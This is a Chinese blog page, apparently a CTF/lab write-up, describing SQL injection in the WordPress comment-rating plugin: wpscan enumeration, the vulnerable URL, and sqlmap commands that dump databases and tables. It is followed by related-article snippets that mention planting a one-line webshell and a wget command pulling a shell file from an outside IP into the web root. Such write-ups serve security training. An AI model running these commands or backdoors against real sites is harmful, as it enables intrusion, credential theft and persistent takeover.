WordPress插件漏洞分析溯源

最新推荐文章于 2024-04-13 00:25:18 发布
最新推荐文章于 2024-04-13 00:25:18 发布
阅读量543 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36933272/article/details/100503788
版权
本文通过使用wpscan工具发现WordPress网站存在的评论评级插件漏洞,详细阐述了如何识别注入点并利用sqlmap进行数据库探测,包括获取数据库名、表名、列名以及用户登录信息。最终,通过修改插件并植入后门,实现了对网站的潜在控制。
摘要由CSDN通过智能技术生成

打开wpscan扫描,输入wpscan --url http://219.153.49.228:48780 --enumerate vp,这是扫描wordpress存在漏洞的插件

发现出现漏洞插件 [1566903968447592.png]

打开连接,查找到注入点define(‘URL’,$url[‘path’].‘wp-content/plugins/comment-rating/ck-processkarma.php?id=’.IDCOMMENT.’&action=add&path=a&imgIndex=1_14_’),于是开始构造连接http://219.153.49.228:48780/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a

打开sqlmap,开始查找数据库,表,列,字段值sqlmap -u “http://219.153.49.228:48780/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a” --dbs --batch;

sqlmap -u “http://219.153.49.228:48780/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a” -D “test” --tables;

sqlmap -u “http://219.153.49.228:48780/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&pa

最低0.47元/天 解锁文章
qq_36933272
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院 - WordPress插件漏洞分析溯源
多崎巡礼的博客
08-30 2165
使用wpscan扫面wordpress漏洞插件 wpscan --url  "ip" --enumerate vp   查找插件漏洞http://www.bkjia.com/xtaq/783717.html 构造链接 http://ip/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&actio...
墨者靶场 WordPress插件漏洞分析溯源
永远是少年
12-30 1484
今天继续给大家介绍CTF刷题,本文主要内容墨者靶场 WordPress插件漏洞分析溯源。 一、题目简介 二、解题实战
墨者WordPress插件漏洞分析溯源
wswr的博客
03-18 1126
总结:整个流程就算发现这是wordpress然后用专门的wpscan去扫漏洞,然后发现的了插件漏洞,然后利用整个插件漏洞来植入后门,然后获取key文件 思路:尝试绕过登录,进入页面发现不行,然后面向搜索引擎学习,看别人的做法 这个老哥的做法和流程应该是没问题,只是到了那个要翻墙的环节我应该就不行了 WordPress插件SQL注入漏洞——漏洞复现_W小哥1的博客-CSDN博客_wordpress注入漏洞 于是我又看了这个老哥 墨者学院 - WordPress插件漏洞分析溯源_多崎巡礼的博客-CSD
7-PHP代码审计——wordpress插件漏洞分析
网络安全
04-27 1369
1. wordpress插件漏洞 wordpress本身的安全性是比较完善的,通常安全审计中大部分的漏洞都是来自wordpress的安装的第三方插件wordpress并不保证这些插件的安全性,因为第三方插件都是由其他的开发者编写的,插件的安全性取决于开发者的水平和安全意识,毕竟每个开发者的安全意识是不一样的。 因此在进行wordpress漏洞挖掘的时候,从插件入手分析是一个不错的选择。 在分析wordpress插件漏洞的环境以及用到的插件: Ultimate Produce Catalog.
360众测靶场题库之85- WordPress插件漏洞分析溯源,2024年最新5分钟搞定
2401_83974087的博客
04-13 363
字段爆出来之后,便可以利用用户名和密码登录WordPress后台。看到插件一栏,点击修改comment-rating插件的PHP源文件,需要注意,修改的源文件最好是已启用的,添加一句话木马:,下一步就是菜刀连了。
wordpress 评论插件 wpDiscuz 任意文件上传漏洞分析1
08-03
WordPress wpDiscuz 评论插件任意文件上传漏洞分析WordPress 是一款广泛使用的开源内容管理系统,而 wpDiscuz 是一个流行的评论插件,它为 WordPress 网站提供了丰富的交互式评论功能。然而,如同任何软件一样...
推荐十款免费 WordPress 插件
10-24
本文给大家介绍的是今年必备的10款WordPress插件,非常的实用,包含WordPress SEO By Yoast,Akismet,W3 Total Cache,Disqus Comment System,Google Sitemap Generator,Jetpack,Limit Login Attempts,Contact ...
WordPress优化插件WPOPT v2.2.0
最新发布
05-24
WordPress优化插件WPOPT v2.2.0,能对WordPress底层功能进行优化,支持功能开关,系统加速等功能。 2.0版本全新发布,采用vite打包,界面采用Vue3+element-plus制作。无论是外观,还是框架功能,都是空前的强大。 ...
Wordpress免登陆发布插件
08-08
然而,需要注意的是,任何远程接口都可能存在安全风险,所以确保插件及时更新以防止潜在的漏洞攻击至关重要。 总的来说,"Wordpress免登陆发布插件"是一个为了优化 Wordpress 内容发布流程而设计的工具,它通过提供...
WordPress插件百度推送管理3.4
11-24
3. **保持更新**:定期更新插件至最新版本,以获取最新的功能和修复的安全漏洞。 4. **与其他SEO插件配合**:若已使用其他SEO插件,需注意两者间的兼容性,避免功能冲突。 5. **数据分析**:定期查看插件提供的...
CVE-2022-1329 WordPress 500万量级插件 Elementor 远程命令执行漏洞分析
include_voidmain的博客
06-02 1247
CVE-2022-1329 WordPress 500万量级插件 Elementor 远程命令执行漏洞分析
漏洞复现】WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)
做自己喜欢的事,并将其发挥到极致!
09-15 968
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统(CMS)来使用。文件管理器允许您直接从WordPress后端编辑、删除、上传、下载、压缩、复制和粘贴文件和文件夹。有史以来功能最强大、最灵活、最简单的WordPress文件管理解决方案。WordPress插件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程代码执行。
WordPress再曝流行插件漏洞 影响上千万网站
weixin_34005042的博客
09-04 243
本文讲的是WordPress再曝流行插件漏洞 影响上千万网站,WordPress的一个最为流行的插件现重大安全漏洞,导致上千万网站面临黑客入侵的危险。 该漏洞WordPress漏洞扫描器的开发者瑞恩·迪赫斯特(Ryan Dewhurst)发现,该插件名为“WordPress SEO by Yoast”,用于网站的搜索引擎优化,是最流行的WordPre...
墨者学院---CMS系统漏洞分析溯源(第5题)
qq_35105713的博客
10-25 1191
 cookie添加 admin_name字段,Value任意。保存 访问http://219.153.49.228:48489/admin/cms_admin.php,即可获得key
WordPress 远程命令执行漏洞
weixin_47493074的博客
10-01 502
WordPress 远程命令执行漏洞
Wordpress 6.1.1 后台命令执行
zkaqlaoniao的博客
12-13 244
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持 PHP 和 MySQL数据库的服务器上使用自己的博客。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。来看86行,这是获取插件的版本和名称,然后直接进入118行,插件->上传插件->触发命令执行漏洞
CMS漏洞wordpress01
zh的博客
10-15 834
靶场地址:http://whalwl.site:8041/ 解题准备:准备POC 解题思路: 1、抓包,准备修改数据包 执行命令,远程下载一个shell,到靶场网站根目录。 /usr/bin/wget --output-document /var/www/html/999.php 167.160.xxx.217/999.txt 2、具体请求包: POST /wp-login.php?action=lostpassword HTTP/1.1Host: target(any -fr...
WordPress建站教程:WordPress 漏洞报告-2023年1月25日
sixeit的博客
01-29 316
WordPress的系统使用越来越广发,很多的大型企业开始选择利用WordPress作为主技术支撑,但是也有很多人对WordPress系统安全不了解,下面我们由北京六翼信息技术有限公司的技术开发工程师为大家讲解WordPress建站安全问题处理中的漏洞报告。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值